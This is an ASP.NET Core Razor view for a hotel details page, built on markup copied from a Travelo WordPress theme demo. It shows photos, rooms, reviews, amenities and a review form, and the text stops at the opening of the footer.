@model HotelManagementSystem.Models.Hotels.HotelsDetailsViewModel
@{
    this.ViewData["Title"] = "Details";
}

<!DOCTYPE html>
<!--[if IE 7 ]> <html class="ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 oldie" lang="en-US"> <![endif]-->
<!--[if IE   ]> <html class="ie" lang="en-US"> <![endif]-->
<!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<html lang="en-US">
<head>
    <!-- Page Title -->
    <title>Carnival Palace Hotel - Travelo - Travel/Tour Booking WordPress Theme</title>

    <!-- Meta Tags -->
    <meta https-equiv="X-UA-Compatible" content="IE=Edge"/>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

        <link rel="shortcut icon" href="https://www.soaptheme.net/wordpress/travelo/wp-content/uploads/2015/05/favicon.ico" type="image/x-icon" />
    
    <!-- CSS for IE -->
    <!--[if lte IE 9]>
        <link rel="stylesheet" type="text/css" href="css/ie.css" />
    <![endif]-->

    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script type='text/javascript' src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
      <script type='text/javascript' src="https://cdnjs.cloudflare.com/ajax/libs/respond.js/1.4.2/respond.js"></script>
    <![endif]-->
    
<!-- This site is optimized with the Yoast SEO plugin v11.2.1 - httpss://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="https://www.soaptheme.net/wordpress/travelo/accommodation/carnival-palace-hotel/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Carnival Palace Hotel - Travelo - Travel/Tour Booking WordPress Theme" />
<meta property="og:description" content="About Carnival Palace Hotel Sed aliquam nunc eget velit imperdiet, in rutrum mauris malesuada. Quisque ullamcorper vulputate nisi, et fringilla ante convallis quis. Nullam vel tellus non elit suscipit volutpat. Integer id felis et nibh rutrum dignissim ut non risus. In tincidunt urna quis sem luctus, sed accumsan magna pellentesque. Donec et iaculis tellus. Vestibulum &hellip;" />
<meta property="og:url" content="https://www.soaptheme.net/wordpress/travelo/accommodation/carnival-palace-hotel/" />
<meta property="og:site_name" content="Travelo - Travel/Tour Booking WordPress Theme" />
<meta property="og:image" content="https://www.soaptheme.net/wordpress/travelo/wp-content/uploads/2014/11/9.jpg" />
<meta property="og:image:width" content="900" />
<meta property="og:image:height" content="500" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="About Carnival Palace Hotel Sed aliquam nunc eget velit imperdiet, in rutrum mauris malesuada. Quisque ullamcorper vulputate nisi, et fringilla ante convallis quis. Nullam vel tellus non elit suscipit volutpat. Integer id felis et nibh rutrum dignissim ut non risus. In tincidunt urna quis sem luctus, sed accumsan magna pellentesque. Donec et iaculis tellus. Vestibulum [&hellip;]" />
<meta name="twitter:title" content="Carnival Palace Hotel - Travelo - Travel/Tour Booking WordPress Theme" />
<meta name="twitter:image" content="https://www.soaptheme.net/wordpress/travelo/wp-content/uploads/2014/11/9.jpg" />
<script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@@context":"httpss://schema.org","@@graph":[{"@@type":"Organization","@@id":"https://www.soaptheme.net/wordpress/travelo/#organization","name":"","url":"https://www.soaptheme.net/wordpress/travelo/","sameAs":[]},{"@@type":"WebSite","@@id":"https://www.soaptheme.net/wordpress/travelo/#website","url":"https://www.soaptheme.net/wordpress/travelo/","name":"Travelo - Travel/Tour Booking WordPress Theme","publisher":{"@@id":"https://www.soaptheme.net/wordpress/travelo/#organization"},"potentialAction":{"@@type":"SearchAction","target":"https://www.soaptheme.net/wordpress/travelo/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@@type":"WebPage","@@id":"https://www.soaptheme.net/wordpress/travelo/accommodation/carnival-palace-hotel/#webpage","url":"https://www.soaptheme.net/wordpress/travelo/accommodation/carnival-palace-hotel/","inLanguage":"en-US","name":"Carnival Palace Hotel - Travelo - Travel/Tour Booking WordPress Theme","isPartOf":{"@@id":"https://www.soaptheme.net/wordpress/travelo/#website"},"image":{"@@type":"ImageObject","@@id":"https://www.soaptheme.net/wordpress/travelo/accommodation/carnival-palace-hotel/#primaryimage","url":"https://www.soaptheme.net/wordpress/travelo/wp-content/uploads/2014/11/9.jpg","width":900,"height":500},"primaryImageOfPage":{"@@id":"https://www.soaptheme.net/wordpress/travelo/accommodation/carnival-palace-hotel/#primaryimage"},"datePublished":"2014-11-04T13:55:27+00:00","dateModified":"2014-12-08T08:51:07+00:00"}]}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Travelo - Travel/Tour Booking WordPress Theme &raquo; Feed" href="https://www.soaptheme.net/wordpress/travelo/feed/" />
<link rel="alternate" type="application/rss+xml" title="Travelo - Travel/Tour Booking WordPress Theme &raquo; Comments Feed" href="https://www.soaptheme.net/wordpress/travelo/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"httpss:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"httpss:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.soaptheme.net\/wordpress\/travelo\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.15"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-includes/css/dist/block-library/style.min.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
<link rel='stylesheet' id='trav_style_font_googleapis-css'  href='//fonts.googleapis.com/css?family=Lato%3A300%2C400%2C700%2C900&#038;ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_animate-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/css/animate.min.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_font_awesome-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/css/font-awesome.min.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_bootstrap-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/css/bootstrap.min.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_flexslider-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/components/flexslider/flexslider.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_bxslider-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/components/jquery.bxslider/jquery.bxslider.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_timepicker-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/components/jquery.timepicker/jquery.timepicker.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_main_style-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/css/style-light-blue.min.css?ver=5.2.15' type='text/css' media='all' />
<link rel='stylesheet' id='trav_style_custom-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/css/custom.css?ver=5.2.15' type='text/css' media='all' />
<style id='trav_style_custom-inline-css' type='text/css'>
     .starFade {
            background-image: url('https://raw.githubusercontent.com/dotnetfunda/StarRatingSystem/master/Images/StarFade.gif');
            min-width: 30px;
            min-height: 30px;
            display: inline-block;
            cursor: pointer;
        }
        .starFadeN {
            background-image: url('https://raw.githubusercontent.com/dotnetfunda/StarRatingSystem/master/Images/StarFade.gif');
            min-width: 30px;
            min-height: 30px;
            display: inline-block;
        }
        .starGlow {
            background-image: url('https://raw.githubusercontent.com/dotnetfunda/StarRatingSystem/master/Images/StarGlow.gif');
            min-width: 30px;
            min-height: 30px;
            display: inline-block;
            cursor: pointer;
        }
        .starGlowN {
            background-image: url('https://raw.githubusercontent.com/dotnetfunda/StarRatingSystem/master/Images/StarGlow.gif');
            min-width: 30px;
            min-height: 30px;
            display: inline-block;
        }
                .available a:before, .available span:before {
                    content: 'AVAILABLE';
                }
                .date-passed a:before, .date-passed span:before {
                    content: 'DATE PASSED';
                }
                .unavailable a:before, .unavailable span:before {
                    content: 'NOT AVAILABLE';
                }
            #header .logo a, #footer .bottom .logo a, .chaser .logo a, .logo-modal {
                background-image: url(https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/images/logo.png);
                background-repeat: no-repeat;
                display: block;
            }
            .chaser .logo a {
                background-size: auto 20px;
            }.footer-wrapper .widget_nav_menu ul {
    column-count: 2;
}

#page-wrapper{overflow-x: hidden; }

.parallax {
    background-position: center !important;
    background-attachment: initial !important;
}
</style>
<link rel='stylesheet' id='trav_style_responsive-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/css/responsive.min.css?ver=5.2.15' type='text/css' media='all' />
<!--[if lt IE 9]>
<link rel='stylesheet' id='vc_lte_ie9-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?ver=6.0.1' type='text/css' media='screen' />
<![endif]-->
<link rel='stylesheet' id='mc4wp-form-basic-css'  href='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/mailchimp-for-wp/assets/css/form-basic.min.css?ver=4.5.2' type='text/css' media='all' />
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='httpss://api.w.org/' href='https://www.soaptheme.net/wordpress/travelo/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.soaptheme.net/wordpress/travelo/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.soaptheme.net/wordpress/travelo/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.2.15" />
<link rel='shortlink' href='https://www.soaptheme.net/wordpress/travelo/?p=193' />
<link rel="alternate" type="application/json+oembed" href="https://www.soaptheme.net/wordpress/travelo/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.soaptheme.net%2Fwordpress%2Ftravelo%2Faccommodation%2Fcarnival-palace-hotel%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.soaptheme.net/wordpress/travelo/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.soaptheme.net%2Fwordpress%2Ftravelo%2Faccommodation%2Fcarnival-palace-hotel%2F&#038;format=xml" />
<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<meta name="generator" content="Powered by Slider Revolution 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />
<script type="text/javascript">function setREVStartSize(e){									
						try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;
							if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})					
						}catch(d){console.log("Failure at Presize of Slider:"+d)}						
					};</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>
<body class="accommodation-template-default single single-accommodation postid-193 wpb-js-composer js-comp-ver-6.0.1 vc_responsive">
    <div id="page-wrapper">

       
        </div>
    </div>

<header id="header" class="navbar-static-top">
	<div class="topnav hidden-xs">
		<div class="container">
			<ul class="quick-menu pull-left">
									<li><a href="#travelo-login" class="soap-popupbox">MY ACCOUNT</a></li>
													<li class="ribbon">
						<a href="#" title="">usd</a>
						<ul class="menu mini">
							<li class="active"><a href="/wordpress/travelo/accommodation/carnival-palace-hotel/?adults=1&#038;kids=0&#038;rooms=1&#038;date_from=&#038;date_to=&#038;selected_currency=usd" title="United States Dollar">USD</a></li><li><a href="/wordpress/travelo/accommodation/carnival-palace-hotel/?adults=1&#038;kids=0&#038;rooms=1&#038;date_from=&#038;date_to=&#038;selected_currency=rub" title="Russian Ruble">RUB</a></li>						</ul>
					</li>
											</ul>
			<ul class="quick-menu pull-right">
				<!--<li><a href="httpss://themeforest.net/item/travelo-traveltour-booking-wordpress-theme/9806696?license=regular&open_purchase_for_item_id=9806696&purchasable=source&ref=SoapTheme" class="button yellow btn-small" style="height: 30px; font-size: 1em;"><i class="soap-icon-shopping"></i> PURCHASE</a></li>-->
									<li><a href="#travelo-login" class="soap-popupbox">LOGIN</a></li>
											<li><a href="#travelo-signup" class="soap-popupbox">SIGNUP</a></li>
									
			</ul>
		</div>
	</div>
	<div id="main-header">

		<div class="main-header">
			<a href="#mobile-menu-01" data-toggle="collapse" class="mobile-menu-toggle">
				Mobile Menu Toggle
			</a>

			<div class="container">
				<div class="logo navbar-brand">
					<a href="https://www.soaptheme.net/wordpress/travelo">
						<img src="https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/images/logo.png" alt="Travelo &#8211; Travel/Tour Booking WordPress Theme" />
					</a>
				</div>
								 <nav id="main-menu" class="menu-main-menu-container">
                            <ul id="menu-main-menu" class="menu">
                                <li id="menu-item-1108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-has-children menu-item-1108">
                                    <a href="/">Home</a>
                                </li>
                                <li id="menu-item-657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-657 megamenu-menu"><a asp-controller="Home" asp-action="AboutUs">About</a>
                                <li id="menu-item-657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-657 megamenu-menu"><a>Contact us</a>
                                <li id="menu-item-657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-657 megamenu-menu"><a asp-controller="SearchHotels" asp-action="List">Search Hotels</a>
                                <li id="menu-item-657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-657 megamenu-menu"><a asp-controller="HotelsList" asp-action="HotelsList">Hotels List</a>
                                <li id="menu-item-657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-657 megamenu-menu"><a asp-controller="Clients" asp-action="Create">Create Client</a>
                                <li id="menu-item-657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-657 megamenu-menu"><a asp-controller="Clients" asp-action="All">All Clients</a>
                            </ul>
                        </nav>			</div><!-- .container -->

		</div><!-- .main-header -->
	</div><!-- #main-header -->
<!-- mobile menu -->

</header>


        <div id="travelo-signup" class="travelo-modal-box travelo-box">
            <div>
                <a href="#" class="logo-modal">Travelo &#8211; Travel/Tour Booking WordPress Theme<img src="https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/images/logo.png" alt="Travelo &#8211; Travel/Tour Booking WordPress Theme"></a>
            </div>
            <form name="registerform" action="https://www.soaptheme.net/wordpress/travelo/wp-login.php?action=register" method="post">
                <div class="form-group">
                    <input type="text" name="user_login" class="input-text full-width" placeholder="user name">
                </div>
                <div class="form-group">
                    <input type="email" name="user_email" class="input-text full-width" placeholder="email address">
                </div>
                <div class="form-group">
                    <p class="description">By signing up, I agree to Travelo&#039;s Terms of Service, Privacy Policy, Guest Refund Policy, and Host Guarantee Terms</p>
                </div>
                <input type="hidden" name="redirect_to" value="https://www.soaptheme.net/wordpress/travelo/wp-login.php?checkemail=confirm">
                <button type="submit" class="full-width btn-medium">SIGN UP</button>
            </form>
            <div class="seperator"></div>
            <p>Already a member? <a href="#travelo-login" class="goto-login soap-popupbox">Login</a></p>
        </div>
        <div id="travelo-login" class="travelo-modal-box travelo-box">
        <div>
            <a href="#" class="logo-modal">Travelo &#8211; Travel/Tour Booking WordPress Theme<img src="https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/images/logo.png" alt="Travelo &#8211; Travel/Tour Booking WordPress Theme"></a>
        </div>
        <form name="loginform" action="https://www.soaptheme.net/wordpress/travelo/wp-login.php" method="post">
            <div class="form-group">
                <input type="text" name="log" tabindex="1" class="input-text full-width" placeholder="user name">
            </div>
            <div class="form-group">
                <input type="password" name="pwd" tabindex="2" class="input-text full-width" placeholder="password">
            </div>
            <div class="form-group">
                <a href="https://www.soaptheme.net/wordpress/travelo/wp-login.php?action=lostpassword" class="forgot-password pull-right">Forgot password?</a>
                <div class="checkbox checkbox-inline">
                    <label>
                        <input type="checkbox" name="rememberme" tabindex="3" value="forever"> Remember me                    </label>
                </div>
            </div>
            <div class="form-group">
                <button tabindex="4" class="button btn-medium btn-login full-width">LOG IN</button>
            </div>
            <input type="hidden" name="redirect_to" value="https://www.soaptheme.net/wordpress/travelo/dashboard/">
        </form>

                    <div class="seperator"></div>
            <p>Don't have an account? <a href="#travelo-signup" class="goto-signup soap-popupbox">Sign up</a></p>
            </div>
<div class="page-title-container">
    <div class="container">
        <div class="page-title pull-left">
            <h2 class="entry-title">
                Carnival Palace Hotel            </h2>
        </div>
        <ul class="breadcrumbs pull-right"><li><a href="https://www.soaptheme.net/wordpress/travelo" title="Home">Home</a></li><li class="active">Carnival Palace Hotel</li></ul>    </div>
</div>
        <section id="content">
            <div class="container">
                <div class="row">
                    <div id="main" class="col-sm-8 col-md-9">
                        <div class="tab-container style1" id="hotel-main-content">
                            <ul class="tabs">

                                                                    <li><a data-toggle="tab" href="#photos-tab">photos</a></li>
                                
                                                                                                         
                                
                                
                            </ul>
                            <div class="tab-content">

                                                                    <div id="photos-tab" class="tab-pane fade">
                                        <div class="photo-gallery flexslider style1" data-animation="slide" data-sync="#photos-tab .image-carousel">
                                            <ul class="slides">
                                                @foreach (var photo in this.Model.Photos)
                                            {
                                                <li><img width="900" height="500" src="@photo.RemoteUrl" class="attachment-slider-gallery size-slider-gallery" alt="" srcset="@photo.RemoteUrl 900w, @photo.RemoteUrl 300w" sizes="(max-width: 900px) 100vw, 900px" /></li>
                                            }
                                        </ul>
                                        </div>
                                        <div class="image-carousel style1" data-animation="slide" data-item-width="70" data-item-margin="10" data-sync="#photos-tab .photo-gallery">
                                            <ul class="slides">
                                                @foreach (var photo in this.Model.Photos)
                                                {
                                                    <li><img width="64" height="64" src="@photo.RemoteUrl" class="attachment-widget-thumb size-widget-thumb" alt="" srcset="@photo.RemoteUrl 64w, @photo.RemoteUrl 150w" sizes="(max-width: 64px) 100vw, 64px" /></li>
                                                }
                                            </ul>
                                        </div>
                                    </div>
                                
                                                                                                            <div id="map-tab" class="tab-pane fade"></div>
                                                                                                                <div id="steet-view-tab" class="tab-pane fade" style="height: 500px;"></div>
                                                                    
                                                                    <div id="calendar-tab" class="tab-pane fade">
                                        <div class="row">

                                            <div class="col-sm-6 col-md-4 no-lpadding">
                                                <label>SELECT MONTH</label>
                                                <div class="selector">
                                                    <select class="full-width" id="select-month">
                                                        <option value="2022-3"> March 2022</option><option value="2022-4"> April 2022</option><option value="2022-5"> May 2022</option><option value="2022-6"> June 2022</option><option value="2022-7"> July 2022</option><option value="2022-8"> August 2022</option><option value="2022-9"> September 2022</option><option value="2022-10"> October 2022</option><option value="2022-11"> November 2022</option><option value="2022-12"> December 2022</option><option value="2023-1"> January 2023</option><option value="2023-2"> February 2023</option>                                                    </select>
                                                </div>
                                            </div>

                                                                                                <div class="col-sm-6 col-md-4 no-lpadding">
                                                        <label>SELECT ROOM TYPE</label>
                                                        <div class="selector">
                                                            <select class="full-width" id="select-room-type">
                                                                <option value="">All Room Types</option>
                                                                <option value="247">Deluxe Triple Room</option><option value="246">Deluxe Double Room</option><option value="245">Superior Double Room</option>                                                            </select>
                                                        </div>
                                                    </div>
                                            
                                        </div>
                                        <div class="row">
                                                                                            <div class="calendar"></div>
                                                <div class="calendar-legend">
                                                    <label class="available">available</label>
                                                    <label class="unavailable">unavailable</label>
                                                    <label class="past">past</label>
                                                </div>
                                            
                                        </div>
                                    </div>
                                                            </div>
                        </div>

                        <div id="hotel-features" class="tab-container">
                            <ul class="tabs">
                                                                <li class="active"><a href="#hotel-description" data-toggle="tab">Description</a></li>
                                <li><a href="#hotel-availability" data-toggle="tab">Availability</a></li>
                                <li><a href="#hotel-amenities" data-toggle="tab">Amenities</a></li>
                                                                   
                            </ul>
                            <div class="tab-content">
                                <div class="tab-pane fade" id="hotel-availability">
                                   
                                    <h2>Available Rooms</h2>
                                    <div class="room-list listing-style3 hotel">

                                        
				                     @foreach (var room in this.Model.Rooms)
                         {
                             <article class="box">
			<figure class="col-sm-4 col-md-3">
				<a class="hover-effect popup-gallery" data-post_id="247" href="#" title="popup gallery"><img width="230" height="160" src="@room.MainImage" class="attachment-list-thumb size-list-thumb wp-post-image" alt="" /></a>
			</figure>
			<div class="details col-xs-12 col-sm-8 col-md-9">
				<div>
					<div>
						<div class="box-title">
							<h4 class="title"><a >@room.Name</a></h4>
							<dl class="description">
                                	<dt>Capacity:</dt>
									<dd>@room.Capacity</dd>
																	<dt>Adult Price:</dt>
									<dd>@room.AdultPrice.ToString("f2")</dd>
																									<dt>Child Price:</dt>
									<dd>@room.ChildPrice.ToString("f2")</dd>
															</dl>
						</div>
					</div>
					<div class="price-section">
						<span class="price">
													</span>
					</div>
				</div>
				<div>
					<div class="entry-content">
											</div>
					<div class="action-section">
													<a asp-controller="Reservations" asp-action="Create" asp-route-roomId="@room.Id" title="create reservation" class="button btn-small full-width text-center">CREATE RESERVATION</a>
											</div>
				</div>
			</div>
		</article>
                         }
		
                                    </div>
                                </div>
                                <div class="tab-pane fade in active" id="hotel-description">
                                    <div class="intro table-wrapper full-width hidden-table-sms">
                                        <div class="col-sm-4 features table-cell">
                                            <table>
                                            <tr><td><label>Type:</label></td><td>@this.Model.AccommodationType</td></tr><tr><td><label>Rating Stars:</label></td><td>@this.Model.Stars star</td></tr><tr><td><label>Country:</label></td><td>@this.Model.Country</td></tr><tr><td><label>City:</label></td><td>@this.Model.Town</td></tr>                                         </table>
                                        </div>
                                     
                                                                                            <div class="col-sm-8 table-cell testimonials no-rpadding no-lpadding">
                                                        <div class="testimonial style1"><ul class="slides ">
                                                            @foreach (var review in this.Model.Reviews)
                                                           {
                                                               <li><p class="description">@review.Content</p><div class="author-section clearfix"><a href=""><img src="@review.UserProfileImage" alt="author-image" width="74" height="74" /></a><h5 class="name">@review.UserFullName</h5></div></li>
                                                           }
                                                           </ul></div>                                                    </div>
                                                                            </div>
                                    <div class="long-description">
                                        <div class="box entry-content">
                                            <h2>About @this.Model.Name</h2>
<p>@this.Model.Description</p>
                                                                                    </div>
                                        
<h2>ADD REVIEW</h2>
 <form method="post" asp-controller="Reviews" asp-action="Add">
                        @Html.AntiForgeryToken()


                        <div onmouseout="CRateSelected()">
                            <span class="starFade" id="Rate1" onclick="CRate(1)" onmouseover="CRateOver(1)" onmouseout="CRateOut(1)"></span><span class="starFade" id="Rate2" onclick="CRate(2)" onmouseover="CRateOver(2)" onmouseout="CRateOut(2)"></span><span class="starFade" id="Rate3" onclick="CRate(3)" onmouseover="CRateOver(3)" onmouseout="CRateOut(3)"></span><span class="starFade" id="Rate4" onclick="CRate(4)" onmouseover="CRateOver(4)" onmouseout="CRateOut(4)"></span><span class="starFade" id="Rate5" onclick="CRate(5)" onmouseover="CRateOver(5)" onmouseout="CRateOut(5)"></span>
                        </div>


                        <div class="form-group">
                            <textarea name="Content" id="Content" rows="5" class="form-control"></textarea>
                        </div>


                        <div>
                            <input type="hidden" name="HotelId" value="@this.Model.Id" />
                            <input type="hidden" name="Rating" id="Rating" value="0" />


                            <button type="submit" class="btn btn-info">Send</button>
                        </div>
                    </form>
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="hotel-amenities">
                                    <h2>Amenities of Carnival Palace Hotel</h2>
                                    <p>
                                        Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.                                    </p>
                                    <ul class="amenities clearfix style1">
                                        @foreach (var amenity in this.Model.Amenities)
                                        {
                                            <li class="col-md-4 col-sm-6"><div class="icon-box style1"><i class="soap-icon-aircon"></i>@amenity.Name</div></li>
                                        }
                                    </ul>
                                </div>
                               
                            </div>
                        </div>
                    </div>
                    <div class="sidebar col-sm-4 col-md-3">
                        <article class="detailed-logo">
                                                            <figure>
                                    <img width="114" src="@this.Model.MainImage" alt="Accommodation Logo">
                                </figure>
                                                        <div class="details">
                                <h2 class="box-title">
                                    @this.Model.Name                                     <div title="@this.Model.Stars-star Hotel" class="five-stars-container no-back-star" data-toggle="tooltip" data-placement="bottom"><span class="five-stars" style="width: 80%;"></span></div>                                    <small><i class="soap-icon-departure yellow-color"></i><span class="fourty-space">Las Vegas, United States</span></small>
                                </h2>
                                                                    <span class="price clearfix">
                                        <small class="pull-left">avg/night</small>
                                        <span class="pull-right">$@this.Model.AveragePrice.ToString("f2")</span>
                                    </span>
                                                                <div class="feedback clearfix">
                                    <div title="0 stars" class="five-stars-container" data-toggle="tooltip" data-placement="bottom"><span class="five-stars" style="width: 0%;"></span></div>
                                    <span class="review pull-right">@this.Model.ReviewsCount reviews</span>
                                </div>
                                <p class="description">
                                    @this.Model.Description                                </p>
                                                                       
                                                            </div>
                        </article>
                        <div id="text-2" class="widget travelo-box widget_text"><h4 class="widgettitle">Why Book with us?</h4>			<div class="textwidget"><div class="list-with-circle-icon">
<ul>
<li>
<i class="soap-icon-savings circle"></i>
<h5 class="title"><a href="#">Low Rates &amp; Savings</a></h5>
<p>Nunc cursus libero pur congue arut nimspnty.</p>
</li>
<li>
<i class="soap-icon-support circle"></i>
<h5 class="title"><a href="#">Excellent Support</a></h5>
<p>Nunc cursus libero pur congue arut nimspnty.</p>
</li>
</ul></div></div>
		</div>                    </div>
                </div>
            </div>
        </section><!-- #content -->

    <footer id="footer" class="style-def">
        <div class="footer-wrapper">
            <div class="container">
                <div class="row">
